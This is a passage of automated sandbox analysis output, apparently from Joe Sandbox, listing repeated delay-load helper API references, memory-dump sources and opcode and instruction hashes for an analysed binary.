                                                                                                                    • Instruction ID: 8ab652627cf8a1041cc37126df37f1741d898ee1ce3d3b854e45cfb36e0c1b85
                                                                                                                    • Opcode Fuzzy Hash: b89ea88bd218b61385e7a11778af1122185db45f01b2520e138d13240ef7edff
                                                                                                                    • Instruction Fuzzy Hash: 65B092E1658080BC320891449806C3B0208C381B12320C02EFD58C5081D8484A480832
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0005E51F
                                                                                                                      • Part of subcall function 0005E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005E8D0
                                                                                                                      • Part of subcall function 0005E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: 06ebdccbeebbb43aa51c62da78fc73c5d7fbb2a0ba73fa60e0cf4a4ebf2ab60d
                                                                                                                    • Instruction ID: c070272769fd16f5f28a3c39f2bd5778b72d626fd1b462800c2a3101df336c9d
                                                                                                                    • Opcode Fuzzy Hash: 06ebdccbeebbb43aa51c62da78fc73c5d7fbb2a0ba73fa60e0cf4a4ebf2ab60d
                                                                                                                    • Instruction Fuzzy Hash: 30B092E26584807C310C11A49806E3B0208C382B12320802EB89894482A8440E080431
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0005E51F
                                                                                                                      • Part of subcall function 0005E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005E8D0
                                                                                                                      • Part of subcall function 0005E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: ff650818ec7c78d16f59c34b048a636ceafd3db48a4e9a8d412488d5f7e58805
                                                                                                                    • Instruction ID: 49a85d73718e06569b78184f698afc0e72ed880b418ae570d85f1ff968bea6de
                                                                                                                    • Opcode Fuzzy Hash: ff650818ec7c78d16f59c34b048a636ceafd3db48a4e9a8d412488d5f7e58805
                                                                                                                    • Instruction Fuzzy Hash: BEB092E26584807C310C51689902D3B0608C382B12320802EB988C4081A8440E090431
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0005E51F
                                                                                                                      • Part of subcall function 0005E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005E8D0
                                                                                                                      • Part of subcall function 0005E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: 560cf0e3ddd2456f1f99b8b7540759f0cc97d1ffcec800fa030c9bcfad911851
                                                                                                                    • Instruction ID: 9d30c2926c192f3822bcad598b0c7d016623bf0e46a0cd22429150adaa1bfbeb
                                                                                                                    • Opcode Fuzzy Hash: 560cf0e3ddd2456f1f99b8b7540759f0cc97d1ffcec800fa030c9bcfad911851
                                                                                                                    • Instruction Fuzzy Hash: 88B012E26584807D310C5158DC02E3F020CC3C2F12330802FFC8CC4081FC440E080531
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0005E51F
                                                                                                                      • Part of subcall function 0005E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005E8D0
                                                                                                                      • Part of subcall function 0005E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: 63774de1bd9618fae3a91887aede0b33719fc8b3f4511d764a798c823b46ff3c
                                                                                                                    • Instruction ID: 1b79905301205a18dc0698b488b6937f919d00c1c0d760aaade72fbeb0714424
                                                                                                                    • Opcode Fuzzy Hash: 63774de1bd9618fae3a91887aede0b33719fc8b3f4511d764a798c823b46ff3c
                                                                                                                    • Instruction Fuzzy Hash: 8CB092E26589807C320C5158D802D3B0208C382B12320822EB888C4081A8441E480435
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0005E580
                                                                                                                      • Part of subcall function 0005E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005E8D0
                                                                                                                      • Part of subcall function 0005E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0005E580
                                                                                                                      • Part of subcall function 0005E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005E8D0
                                                                                                                      • Part of subcall function 0005E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0005E580
                                                                                                                      • Part of subcall function 0005E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005E8D0
                                                                                                                      • Part of subcall function 0005E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0005E1E3
                                                                                                                      • Part of subcall function 0005E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005E8D0
                                                                                                                      • Part of subcall function 0005E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0005E1E3
                                                                                                                      • Part of subcall function 0005E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005E8D0
                                                                                                                      • Part of subcall function 0005E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0005E1E3
                                                                                                                      • Part of subcall function 0005E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005E8D0
                                                                                                                      • Part of subcall function 0005E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0005E1E3
                                                                                                                      • Part of subcall function 0005E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005E8D0
                                                                                                                      • Part of subcall function 0005E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0005E1E3
                                                                                                                      • Part of subcall function 0005E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005E8D0
                                                                                                                      • Part of subcall function 0005E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: e415a9c2b37bde7abac96c527aa35f74172d4f9b2f3ddd3c9d59cdd28e04603f
                                                                                                                    • Instruction ID: 71064f9ed618ad2db8c7b31a89d12184357774d4d459a9e38d8c9a17f2acb8f6
                                                                                                                    • Opcode Fuzzy Hash: e415a9c2b37bde7abac96c527aa35f74172d4f9b2f3ddd3c9d59cdd28e04603f
                                                                                                                    • Instruction Fuzzy Hash: E1A002F5559581BC711C51519E06C7B021DC7C5B52330852EFD5AC84815C556A491475
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0005E1E3
                                                                                                                      • Part of subcall function 0005E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005E8D0
                                                                                                                      • Part of subcall function 0005E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: fe8481ce534ebe9f94db749e2e092309184b28d1944729c4a06e6d2ed744ce66
                                                                                                                    • Instruction ID: 71064f9ed618ad2db8c7b31a89d12184357774d4d459a9e38d8c9a17f2acb8f6
                                                                                                                    • Opcode Fuzzy Hash: fe8481ce534ebe9f94db749e2e092309184b28d1944729c4a06e6d2ed744ce66
                                                                                                                    • Instruction Fuzzy Hash: E1A002F5559581BC711C51519E06C7B021DC7C5B52330852EFD5AC84815C556A491475
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0005E1E3
                                                                                                                      • Part of subcall function 0005E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005E8D0
                                                                                                                      • Part of subcall function 0005E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: fe16b7f56f8d014e88279fda0f97a11e8a8539e89ad447241b2f8dfe99a1e015
                                                                                                                    • Instruction ID: 71064f9ed618ad2db8c7b31a89d12184357774d4d459a9e38d8c9a17f2acb8f6
                                                                                                                    • Opcode Fuzzy Hash: fe16b7f56f8d014e88279fda0f97a11e8a8539e89ad447241b2f8dfe99a1e015
                                                                                                                    • Instruction Fuzzy Hash: E1A002F5559581BC711C51519E06C7B021DC7C5B52330852EFD5AC84815C556A491475
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0005E1E3
                                                                                                                      • Part of subcall function 0005E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005E8D0
                                                                                                                      • Part of subcall function 0005E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: bfedae649512002442ede6447758be1861e269e26528fe640bdf4e0f88abd624
                                                                                                                    • Instruction ID: 71064f9ed618ad2db8c7b31a89d12184357774d4d459a9e38d8c9a17f2acb8f6
                                                                                                                    • Opcode Fuzzy Hash: bfedae649512002442ede6447758be1861e269e26528fe640bdf4e0f88abd624
                                                                                                                    • Instruction Fuzzy Hash: E1A002F5559581BC711C51519E06C7B021DC7C5B52330852EFD5AC84815C556A491475
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0005E1E3
                                                                                                                      • Part of subcall function 0005E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005E8D0
                                                                                                                      • Part of subcall function 0005E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: 8b817fca07f0ee6deb957d4f45fc26f30a9d30ad6750e5c2bc9dfa77106884a8
                                                                                                                    • Instruction ID: 71064f9ed618ad2db8c7b31a89d12184357774d4d459a9e38d8c9a17f2acb8f6
                                                                                                                    • Opcode Fuzzy Hash: 8b817fca07f0ee6deb957d4f45fc26f30a9d30ad6750e5c2bc9dfa77106884a8
                                                                                                                    • Instruction Fuzzy Hash: E1A002F5559581BC711C51519E06C7B021DC7C5B52330852EFD5AC84815C556A491475
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0005E1E3
                                                                                                                      • Part of subcall function 0005E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005E8D0
                                                                                                                      • Part of subcall function 0005E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: 26ff7df14821662e1cfb880702e1be23f75f93ab4b488dcdcb6ad1c27b7993b4
                                                                                                                    • Instruction ID: 71064f9ed618ad2db8c7b31a89d12184357774d4d459a9e38d8c9a17f2acb8f6
                                                                                                                    • Opcode Fuzzy Hash: 26ff7df14821662e1cfb880702e1be23f75f93ab4b488dcdcb6ad1c27b7993b4
                                                                                                                    • Instruction Fuzzy Hash: E1A002F5559581BC711C51519E06C7B021DC7C5B52330852EFD5AC84815C556A491475
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0005E1E3
                                                                                                                      • Part of subcall function 0005E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005E8D0
                                                                                                                      • Part of subcall function 0005E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0005E3FC
                                                                                                                      • Part of subcall function 0005E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005E8D0
                                                                                                                      • Part of subcall function 0005E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0005E3FC
                                                                                                                      • Part of subcall function 0005E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005E8D0
                                                                                                                      • Part of subcall function 0005E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0005E3FC
                                                                                                                      • Part of subcall function 0005E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005E8D0
                                                                                                                      • Part of subcall function 0005E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0005E3FC
                                                                                                                      • Part of subcall function 0005E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005E8D0
                                                                                                                      • Part of subcall function 0005E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0005E3FC
                                                                                                                      • Part of subcall function 0005E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005E8D0
                                                                                                                      • Part of subcall function 0005E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0005E3FC
                                                                                                                      • Part of subcall function 0005E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005E8D0
                                                                                                                      • Part of subcall function 0005E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: cedfcd70c97a86a4c0d4e8446bfde10bd98f1b43cbc3750ac2da44b2754376d4
                                                                                                                    • Instruction ID: 66079e8bae8d8d0ab7942062818848e8759535df2c322054a5a5fe6da77352fe
                                                                                                                    • Opcode Fuzzy Hash: cedfcd70c97a86a4c0d4e8446bfde10bd98f1b43cbc3750ac2da44b2754376d4
                                                                                                                    • Instruction Fuzzy Hash: 77A002F55591917C711C51519D46C7B031DC7C5B52330951EFD59954815C441A491476
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0005E51F
                                                                                                                      • Part of subcall function 0005E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005E8D0
                                                                                                                      • Part of subcall function 0005E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: d75f27740a90aa7c28003b2fd127a5f65a951bbdb19abbd52ab5af3ad06b7a84
                                                                                                                    • Instruction ID: b269582b6b8d0abde51de6825fd23f3c0fe0828cc96572e8c5336aad0e1491d2
                                                                                                                    • Opcode Fuzzy Hash: d75f27740a90aa7c28003b2fd127a5f65a951bbdb19abbd52ab5af3ad06b7a84
                                                                                                                    • Instruction Fuzzy Hash: 52A011E2AA8882BC300C2220AC02C3F020CC3C2F22330882EFC8A88082BC800E080830
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0005E51F
                                                                                                                      • Part of subcall function 0005E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005E8D0
                                                                                                                      • Part of subcall function 0005E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: a2d54c3def95e23c4bda5d137d5f34c1810604b024ec6712f7a7ce2677dfb895
                                                                                                                    • Instruction ID: b269582b6b8d0abde51de6825fd23f3c0fe0828cc96572e8c5336aad0e1491d2
                                                                                                                    • Opcode Fuzzy Hash: a2d54c3def95e23c4bda5d137d5f34c1810604b024ec6712f7a7ce2677dfb895
                                                                                                                    • Instruction Fuzzy Hash: 52A011E2AA8882BC300C2220AC02C3F020CC3C2F22330882EFC8A88082BC800E080830
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0005E51F
                                                                                                                      • Part of subcall function 0005E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005E8D0
                                                                                                                      • Part of subcall function 0005E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: 3854ac7ceef7c8a817ef76e4666e1a237c7ac08da3aa4bcbcca840142ba4c297
                                                                                                                    • Instruction ID: b269582b6b8d0abde51de6825fd23f3c0fe0828cc96572e8c5336aad0e1491d2
                                                                                                                    • Opcode Fuzzy Hash: 3854ac7ceef7c8a817ef76e4666e1a237c7ac08da3aa4bcbcca840142ba4c297
                                                                                                                    • Instruction Fuzzy Hash: 52A011E2AA8882BC300C2220AC02C3F020CC3C2F22330882EFC8A88082BC800E080830
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0005E51F
                                                                                                                      • Part of subcall function 0005E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005E8D0
                                                                                                                      • Part of subcall function 0005E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
